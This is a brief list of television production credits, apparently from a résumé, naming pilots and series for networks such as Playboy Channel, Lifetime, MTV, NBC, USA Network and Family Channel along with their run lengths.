Playboy channel series 13 wks.
Lifetime television pilot.
MTV pilot.
NBC network series 31 weeks.
Pilot.
Public television special.
USA network series 13 weeks.
USA network series 13 weeks.
Family Channel 278 episodes.
Television series.
Series re-design 1995 - present.
Series 1996 to present